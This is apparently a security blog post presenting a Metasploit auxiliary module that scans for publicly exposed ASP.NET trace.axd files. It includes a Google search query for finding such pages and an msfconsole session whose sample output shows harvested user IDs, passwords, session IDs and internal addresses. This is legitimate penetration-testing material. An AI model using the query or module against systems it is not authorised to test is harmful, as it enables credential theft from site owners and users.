This is a nice and easy way to get user credentials and other important information on .NET applications where the programmer has been really clumsy, careless or lazy. Basically, the whole problem starts when an specific web page is configured to trace requests being done by clients. All these requests will be saved to the file trace.axd. However the problem is not configuring web pages to log clients requests, the real problem is allowing access to the trace.axd file from the Internet. I know, it just sounds stupid to allow this kind of access remotely to this file however you would be surprised on how many programmers forget to remove this access and only allow read access locally. In case you want to just take a look of what kind of information you would find on a trace.axd file I suggest a google search, for example:
"Requests to this Application" inurl:trace.axd
OK. Now that this was explained I developed a small metasploit/wmap module that will look for trace.axd files available on an specific file and print sensitive information on the msfconsole. Obviously I took as a template other module and started from there.
The following is an example of how to use this module:
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r8140 updated 14 days ago (2010.01.16)
msf > use auxiliary/scanner/http/trace_axd
msf auxiliary(trace_axd) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The test path to find trace.axd file
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(trace_axd) > set RHOSTS example.com
RHOSTS => example.com
msf auxiliary(trace_axd) > set PATH /path/
PATH => /path/
msf auxiliary(trace_axd) > run
.
.
.
http(s)://host_ip/path/Trace.axd?id=1
[*] User ID: user_id
[*] Password: pass
[*] Physical Path: \Inetpub\wwwroot\lalala
[*] Session ID: sgwz55xnci4145ahzbas
[*] Local Address: 10.168.10.180
[*] Headers: HEADERS
[*]
Again, I hope this helps someone. If you want to run this module along with the other wmap modules please look at the crawler post in this same blog or wmap documentation. Basically you just have to browse using a proxy and load the db_wmap module.
c4an.
No comments:
Post a Comment